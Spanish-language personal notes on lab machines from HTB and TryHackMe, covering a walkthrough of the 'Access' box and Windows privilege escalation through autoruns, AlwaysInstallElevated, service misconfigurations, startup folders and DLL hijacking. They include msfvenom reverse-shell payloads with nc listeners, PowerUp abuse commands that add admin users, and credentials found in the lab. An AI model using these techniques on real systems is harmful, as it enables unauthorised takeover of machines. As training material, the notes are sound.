21, 23 y 80. En el 80, dirb ha sacado /aspnet_client/. FTP tiene anonumous allowed. Dos carpetas: Backups - backup.mdb (base de datos de Access. mdbopener.com no está funsionando) mdbviewer.herokuapp.com. Tuve que descargarla lanzando en el ftp primero "binary". Engineer - Access Control.zip (con contraseña) En la mdb, carpeta "auth_user": admin:admin engineer:access4u@security backup_admin:admin access4u@security es la pass del zip. El zip saca un .pst con readpst Access\ Control.pst podemos abrirlo y verlo: From john@megacorp.com To security@accesscontrolsystems.com. "The password for the 'security' account has been changed to 4Cc3ssC0ntr0ller. Please ensire this is passed on to your engineers. Regards, John." con telnet entramos en una consola como el user access\security ### Privesc cmdkey /list devuelve: Currently stored credentials: Target: Domain: interactive=ACCESS\Administrator User: ACCESS\Administrator Type: Domain Password NOTA: runas ejecuta pero no printa nada. Entonces la privesc se lanza con: ```bash runas /savecred /user:ACCESS\Administrator "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt" ``` ## Registry - THM windowsprivescarena Ahora entra en juego THM, con https://tryhackme.com/room/windowsprivescarena# Levantamos una windows, accedemos por RDP con *user:password*. Con xfreerdp da error, así que usamos rdesktop: `rdesktop -u user -p password321 10.10.168.218` ### Enumeración - Autorun Lanzamos `C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe` Que nos levanta una herramienta con mucha info sobre los procesos en ejecución, entre los que vemos uno llamado "My Program" y su ruta de instalación. En la CMD ejecutamos entonces: ```bash C:\Users\user>C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program" Accesschk v6.10 - Reports effective permissions for securable objects Copyright (C) 2006-2016 Mark Russinovich Sysinternals - www.sysinternals.com C:\Program Files\Autorun Program\program.exe Medium Mandatory Level (Default) [No-Write-Up] RW Everyone FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS RW BUILTIN\Administrators FILE_ALL_ACCESS ``` Podemos ver que el grupo "Everyone" tiene permiso "FILE_ALL_ACCESS". ¿Cómo descubrirlo también? Preparamos PowerUp con: ```bash powershell.exe -ep bypass . ./PowerUp.ps1 Invoke-AllChecks ``` Que devuelve algo similar a: ```bash [*] Running Invoke-AllChecks [*] Checking if user is in a local group with administrative privileges... [*] Checking for unquoted service paths... ServiceName : AWSLiteAgent Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authentic ated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath> CanRestart : False ServiceName : AWSLiteAgent Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath> CanRestart : False ServiceName : unquotedsvc Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authentic ated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath> CanRestart : True ServiceName : unquotedsvc Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath> CanRestart : True [*] Checking service executable and argument permissions... ServiceName : filepermsvc Path : "C:\Program Files\File Permissions Service\filepermservice.exe" ModifiableFile : C:\Program Files\File Permissions Service\filepermservice.exe ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...} ModifiableFileIdentityReference : Everyone StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'filepermsvc' CanRestart : True [*] Checking service permissions... ServiceName : daclsvc Path : "C:\Program Files\DACL Service\daclservice.exe" StartName : LocalSystem AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc' CanRestart : True [*] Checking %PATH% for potentially hijackable DLL locations... Permissions : {ReadAttributes, ReadControl, Execute/Traverse, WriteAttributes...} ModifiablePath : C:\Temp IdentityReference : NT AUTHORITY\Authenticated Users %PATH% : C:\Temp AbuseFunction : Write-HijackDll -DllPath 'C:\Temp\wlbsctrl.dll' Permissions : {GenericWrite, Delete, GenericExecute, GenericRead} ModifiablePath : C:\Temp IdentityReference : NT AUTHORITY\Authenticated Users %PATH% : C:\Temp AbuseFunction : Write-HijackDll -DllPath 'C:\Temp\wlbsctrl.dll' [*] Checking for AlwaysInstallElevated registry key... AbuseFunction : Write-UserAddMSI [*] Checking for Autologon credentials in registry... [*] Checking for modifidable registry autoruns and configs... Key : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program Path : "C:\Program Files\Autorun Program\program.exe" ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files\Autorun Program\program.exe; IdentityRe ference=Everyone} [*] Checking for modifiable schtask files/configs... [*] Checking for unattended install files... UnattendPath : C:\Windows\Panther\Unattend.xml [*] Checking for encrypted web.config strings... [*] Checking for encrypted application pool and virtual directory passwords... [*] Checking for plaintext passwords in McAfee SiteList.xml files.... [*] Checking for cached Group Policy Preferences .xml files.... ``` Y ahí, en "Checking for modifidable registry autoruns and configs" lo tenemos :) ### Explotación - Autorun ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev.exe No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes ```` Lo subimos, lo ponemos en "C:\Program Files\Autorun Program". Probamos que funciona: ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ nc -nlvp 80 listening on [any] 80 ... connect to [10.8.32.108] from (UNKNOWN) [10.10.168.218] 49216 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\user\Desktop>whoami whoami tcm-pc\user ``` Yay! Sobreescribimos el program.exe que ya había en la carpeta Autorun con el nuevo (para esto necesitamos privs, no entiendo si me salté algo :c ). EDIT: Creo que si en vez de descargar el archivo y moverlo, lo descargaramos directamente en la carpeta final, con el mismo nombre, sería como editarlo y sí colaría... Probar a ver. Ahora cuando algún user hace login en el sistema, le sale un mensajito que dice "Are you sure you want to run this software?" intentando ejecutar el programa. Si le dan a Run, estamos dentro. ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ nc -nlvp 80 listening on [any] 80 ... connect to [10.8.32.108] from (UNKNOWN) [10.10.168.218] 49279 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami tcm-pc\tcm ``` ### Enumeración - AlwaysInstallElevated Volvemos atrás, y nos logamos de nuevo como "user". Notamos que el PowerUp.ps1 nos chivó esto también: ```bash [*] Checking for AlwaysInstallElevated registry key... AbuseFunction : Write-UserAddMSI ``` Que la forma de verlo ahora es viendo que estén a 1 los registros: ```bash PS C:\Users\user> reg query HKLM\Software\Policies\Microsoft\Windows\Installer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 PS C:\Users\user> reg query HKCU\Software\Policies\Microsoft\Windows\Installer HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 ``` ### Explotación - AlwaysInstallElevated Como PowerUp.ps1 chivó que la función a abusar era "Write-UserAddMSI", vamos a verla: (está dentro de PowerUp, así que hay que importarlo). ```bash PS C:\Users\user\Desktop\Tools\PowerUp> powershell.exe -ep bypass Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\user\Desktop\Tools\PowerUp> . .\PowerUp.ps1 PS C:\Users\user\Desktop\Tools\PowerUp> write-useraddmsi OutputPath ---------- UserAdd.msi PS C:\Users\user\Desktop\Tools\PowerUp> ls Directory: C:\Users\user\Desktop\Tools\PowerUp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 11/25/2022 12:13 PM 8256 checks.txt -a--- 5/30/2017 2:35 AM 562841 PowerUp.ps1 -a--- 11/25/2022 12:38 PM 208896 UserAdd.msi ``` Si ejecutamos este nuevo archivito (UserAdd.msi) nos permitirá crear un usuario, definiendo su name, su pass y su grupo. Por defecto: "backdoor:password123:Administrators". Ahora podemos entrar con este nuevo user, siendo Admin :) ```bash Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\backdoor>whoami tcm-pc\backdoor C:\Users\backdoor>hostname TCM-PC C:\Users\backdoor> ``` ### AnotherWay - AlwaysInstallElevated Podemos crear también una revshell con msfvenom en msi: `msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f msi > rev.msi` Y... ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ nc -nlvp 80 listening on [any] 80 ... connect to [10.8.32.108] from (UNKNOWN) [10.10.168.218] 49317 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system ```` Boh! Flipanding. ### Enumeración - regsvc Vamos a ver si tenemos Full control en regsvc, que es el servicio main del registro: ```bash PS C:\Users\user\Desktop\Tools\PowerUp> Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\services\regsvc | fl Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\regsvc Owner : BUILTIN\Administrators Group : NT AUTHORITY\SYSTEM Access : Everyone Allow ReadKey NT AUTHORITY\INTERACTIVE Allow FullControl NT AUTHORITY\SYSTEM Allow FullControl BUILTIN\Administrators Allow FullControl Audit : Sddl : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA) ``` En este caso lo tenemos (menosmal, sino no tendría sentido esta box!): `NT AUTHORITY|INTERACTIVE Allow FullControl`. Parece ser que esos somos nosotros. Va, según esta fuente: https://www.compartir-tecnologias.es/respuesta/urgente-grupos-especiales-ayuda-200385971.html ``` Nt authority\authenticated users: Controla los permisos y procesos de cualquier usuario autentificado en esa maquina, que tenga una ID y una contraseña valida. Nt authority\interactive, gestiona cualquier proceso fisico que no se este fisicamente realizando en el contexto del usuario autentificado localmente, (ej. comando "runas") normalmente ambos "usuarios" estan incluidos en el grupo de "usuarios", puedes verificarlo con el siguiente comando: "net localgroup usuarios" ``` Así que sí que podemos ser nosotros. Podemos entonces añadir un ejecutable malicioso a este servicio para que lo ejecute por nosotros :) ### Explotación - regsvc Nos traemos de la máquina windows el archivo windows_service.c ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ python -m pyftpdlib -p 21 --write /home/aml/.local/lib/python3.10/site-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user. warnings.warn("write permissions assigned to anonymous user.", [I 2022-11-25 19:15:19] concurrency model: async [I 2022-11-25 19:15:19] masquerade (NAT) address: None [I 2022-11-25 19:15:19] passive ports: None [I 2022-11-25 19:15:19] >>> starting FTP server on 0.0.0.0:21, pid=34038 <<< [I 2022-11-25 19:15:22] 10.10.168.218:49353-[] FTP session opened (connect) [I 2022-11-25 19:15:26] 10.10.168.218:49353-[anonymous] USER 'anonymous' logged in. [I 2022-11-25 19:15:32] 10.10.168.218:49353-[anonymous] STOR /home/aml/TryHackMe/windows_service.c completed=1 bytes=2043 seconds=0.127 [I 2022-11-25 19:15:39] 10.10.168.218:49353-[anonymous] FTP session closed (disconnect). ^C[I 2022-11-25 19:16:21] received interrupt signal [I 2022-11-25 19:16:21] >>> shutting down FTP server, 1 socket(s), pid=34038 <<< ``` ```bash PS C:\Users\user\Desktop\Tools\Source> ftp 10.8.32.108 Connected to 10.8.32.108. 220 pyftpdlib 1.5.7 ready. User (10.8.32.108:(none)): anonymous 331 Username ok, send password. Password: 230 Login successful. ftp> put windows_service.c 200 Active data connection established. 125 Data connection already open. Transfer starting. 226 Transfer complete. ftp: 2043 bytes sent in 0.05Seconds 43.47Kbytes/sec. ftp> quit 221 Goodbye. ``` Y editaremos el script malicioso (que está configurado para lanzar un whoami) para que haga lo siguiente: `cmd.exe /k net localgroup administrators user /add` Además, lo compilamos para windows: ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ x86_64-w64-mingw32-gcc windows_service.c -o x.exe ┌──(aml㉿kali)-[~/TryHackMe] └─$ ls rev.exe rev.msi windows_service.c x.exe ``` Y lo subimos, y lo dejamos en C:\Temp. Ahora vamos a añadirlo al servicio haciendo: `reg add HKLM\SYSTEM\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f` y lanzamos el servicio con `sc start regsvc`. Haciendo un `net localgroup administrators` podemos ver que el user pertenece al grupo. ... ... Pero a mi creo que no me ha funsionado :( Importante hacerlo con cmd, no con PS. Pero algo del malware me ha fallado, porque ni lanzándolo con admin me mete en el grupo... ## Executable Files - THM windowsprivescarena Seguimos en la misma room de THM. ```bash ┌──(aml㉿kali)-[~] └─$ xfreerdp /u:user /v:10.10.193.68 /cert:ignore ## password321 ``` ### Enumeración Cargamos PowerUp.ps1 y lanzamos el Invoke-AllChecks: ```powershell PS C:\Users\user\Desktop\Tools\PowerUp> powershell -ep bypass Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\user\Desktop\Tools\PowerUp> . .\PowerUp.ps1 PS C:\Users\user\Desktop\Tools\PowerUp> Invoke-AllChecks [ ... ] [*] Checking service executable and argument permissions... ServiceName : filepermsvc Path : "C:\Program Files\File Permissions Service\filepermservice.exe" ModifiableFile : C:\Program Files\File Permissions Service\filepermservice.exe ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...} ModifiableFileIdentityReference : Everyone StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'filepermsvc' CanRestart : True ``` Otra forma es con *accesschk64.exe*: ```powershell PS C:\Users\user\Desktop\Tools\Accesschk> .\accesschk64.exe -wvu "C:\Program FIles\File Permissions Service" Accesschk v6.10 - Reports effective permissions for securable objects Copyright (C) 2006-2016 Mark Russinovich Sysinternals - www.sysinternals.com C:\Program FIles\File Permissions Service\filepermservice.exe Medium Mandatory Level (Default) [No-Write-Up] RW Everyone FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS RW BUILTIN\Administrators FILE_ALL_ACCESS PS C:\Users\user\Desktop\Tools\Accesschk> ``` Y vemos que en "File Permissions Service" tenemos *FILE_ALL_ACCESS* para Everyone. Esoé! Que pasa, que dar con la tecla es complicao, así que el PowerUp ayuda paeso. ### Explotación Sabiendo todo lo anterior, lo único que tenemos que hacer es subir un ejecutable a la máquina y sobreescribirlo en lugar del vulnerable (filepermservice.exe). Vamos a crear el .exe con msfvenom: ```bash ┌──(aml㉿kali)-[~/HTB] └─$ msfvenom -p windows/x64/exec CMD='cmd.exe /k "net localgroup administrators user /add" -f exe' > ../TryHackMe/useraddx64.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 327 bytes ``` Paramos el proceso a suplantar: ```batch C:\Users\user>sc stop filepermsvc SERVICE_NAME: filepermsvc TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 ``` Y lo subimos, sobreescribiendolo: ![](https://i.imgur.com/cw12Ubm.png) Volvemos a levantar el proceso y... da error ```bash C:\Users\user>sc start filepermsvc [SC] StartService FAILED with error 216. ``` Parece ser que el exe de msfvenom no gusta. Vamos a probar con nuestro old *x.exe* a ver... ```bash C:\Users\user>sc stop filepermsvc SERVICE_NAME: filepermsvc TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 C:\Users\user>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john TCM The command completed successfully. C:\Users\user>sc start filepermsvc SERVICE_NAME: filepermsvc TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 2800 FLAGS : C:\Users\user>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john TCM user The command completed successfully. ``` Ya pertenecemos a administrators!! ## StartUp Applications Esto es bastante interesante, porque PowerUp.ps1 no chiva este fallo, así que hay que probarlo a mano siempre. Gracias a dios, es solo mirar los permisos en una carpeta (y si tal, en sus archivos por si colara por ahí). ### Enumeración Comprobamos qué permisos tenemos en los archivos de Startup. ```powershell C:\Users\user>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F) TCM-PC\TCM:(I)(OI)(CI)(DE,DC) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) Everyone:(I)(OI)(CI)(RX) Successfully processed 1 files; Failed processing 0 files ``` La **F** significa Full Access, así que todos los pertenecientes a "BUILTIN\Users" (o sea, todos los usuarios) podemos escribir aquí, según parece... :) ### Explotación Como siempre. Coger un exe malicioso, subirlo a esa carpeta y esperar a que haga login un administrador. Vamos a probar con msfvenom para lanzar una revshell a ver si va bien: `msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev.exe` Lo subimos a la máquina y lo pegamos en esa carpeta. Ponemos un nc escuchando. Hacemos logout de la máquina y login de nuevo: ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ nc -nlvp 80 listening on [any] 80 ... connect to [10.8.32.108] from (UNKNOWN) [10.10.110.242] 49226 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami tcm-pc\tcm C:\Windows\system32>hostname hostname TCM-PC ``` Fue fácil ## DLL Hijacking ### Enumeración Abrimos la herramienta "Process Monitor" de Windows (no viene nativa) como admin para ver qué ocurre. Vamos a *Filters* y añadimos un filtro "Result - is - NAME NOT FOUND" como vemos en la imagen, y hacemos click en "Add": ![](https://i.imgur.com/T2gLmCh.png) Otro filtro con "Path - ends with - .dll". Damos apply y nos muestra unos pocos de dll's que matchean con lo que buscamos. ![](https://i.imgur.com/DfRLTlb.png) Al ser su resultado "NAME NOT FOUND" y estar intentando buscarlos, podemos intentar sobreescribir la DLL si podemos controlar el servicio y la ubicación tiene permisos de escritura. Si paramos el servicio dllsvc y lo volvemos a lanzar (pensamiento mágico por ahora), veremos que aparecen nuevos procesos en el procmon: ![](https://i.imgur.com/0KSnees.png) Uno de lso notfound está en *C:\Program Files* y otro en *C:\Temp*. Estos suelen ser directorios con permisos de escritura :) ### Explotación Vamos a coger el archivo *windows_dll.c*, a introducirle uno de nuestros payloads y a suplantar una de estas DLL. Let's go! En el .c escribimos que añada nuestro user al grupo administrators, guardamos, compilamos, subimos, guardamos como *hijackme.dll* en c:\Temp y... ![](https://i.imgur.com/v0v305V.png) Lo tenemos! ## Service permissions (Binary Paths) ### Enumeración De forma manual podemos lanzar : `accesschk64.exe -uvcw Everyone *` * -u: No muestres errores ni findings negativos. * -v: Verbose * -c: Muestra el service name * -w: Solo muestra objectos con permisos de escritura * Everyone: El grupo con los permisos para todo lo anterior ```bash! C:\Users\user\Desktop\Tools\Accesschk>accesschk64.exe -uvcw Everyone * Accesschk v6.10 - Reports effective permissions for securable objects Copyright (C) 2006-2016 Mark Russinovich Sysinternals - www.sysinternals.com RW daclsvc SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG "SERVICE_CHANGE_CONFIG" SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS SERVICE_START SERVICE_STOP READ_CONTROL ``` Desde PowerUp.ps1 podemos verlo en el apartado *Checking service permissions": ```bash [*] Checking service permissions... ServiceName : daclsvc Path : "C:\Program Files\DACL Service\daclservice.exe" StartName : LocalSystem AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc' CanRestart : True ``` ### Explotación PowerUp.ps1 Con *PowerUp.ps1* es bien simple. Solo hacer lo que nos chiva el AllChecks: ```bash! PS C:\Users\user\Desktop\Tools\PowerUp> Invoke-ServiceAbuse -Name 'daclsvc' ServiceAbused Command ------------- ------- daclsvc net user john Password123! /add && n... PS C:\Users\user\Desktop\Tools\PowerUp> net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john TCM The command completed successfully. ``` E ya. ### Explotación a mano Más a manubrio se haría así: Vamos a ver más info sobre el ejecutable: ```bash C:\Users\user\Desktop\Tools\Accesschk>sc qc daclsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: daclsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DACL Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem ``` Como tenemos el permiso SERVICE_CHANGE_CONFIG, podemos cambiar la configuración que muestra este último comando, por ejemplo cambiando el ejecutable a lanzar... :) ```bash C:\Users\user\Desktop\Tools\Accesschk>sc config daclsvc binpath= "net localgroup administrators user /add" [SC] ChangeServiceConfig SUCCESS C:\Users\user\Desktop\Tools\Accesschk>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john TCM The command completed successfully. C:\Users\user\Desktop\Tools\Accesschk>sc start daclsvc [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. C:\Users\user\Desktop\Tools\Accesschk>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john TCM user The command completed successfully. ``` Ya pertenece *user* a los administrators :) ## Service permissions (Unquoted Paths) ### Enumeración Parecido al anterior, pero en este caso lo que ocurre es que el path no está entre comillas. Podemos verlo en *PowerUp.ps1* en: ```bash [*] Checking for unquoted service paths... ServiceName : AWSLiteAgent Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\;IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath> CanRestart : False ServiceName : AWSLiteAgent Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath> CanRestart : False ServiceName : unquotedsvc Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\;IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath> CanRestart : True ServiceName : unquotedsvc Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath> CanRestart : True ``` ### Explotación El truco aquí está en que, cuando intenta lanzar el comando "C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe", primero va a intentar lanzar C.exe, luego C:\Program.exe, luego C:\ Program Files\Unquoted.exe, etc... Vamos a ver entonces donde tenemos permisos de escritura, y crearemos ahí un .exe malicioso. ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ i686-w64-mingw32-gcc windows_service.c -o useradd.exe ``` ![](https://i.imgur.com/mUqHEND.png) ```bash C:\Users\user\Desktop\Tools\Accesschk>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john TCM The command completed successfully. C:\Users\user\Desktop\Tools\Accesschk>sc start daclsvc [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. C:\Users\user\Desktop\Tools\Accesschk>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john TCM user The command completed successfully. ``` Y ya! ## Challenge Steel Mountain (THM) No tengo el premium de THM, así que pa otro día. De todos modos ya lo hice en el pasado, parece ser..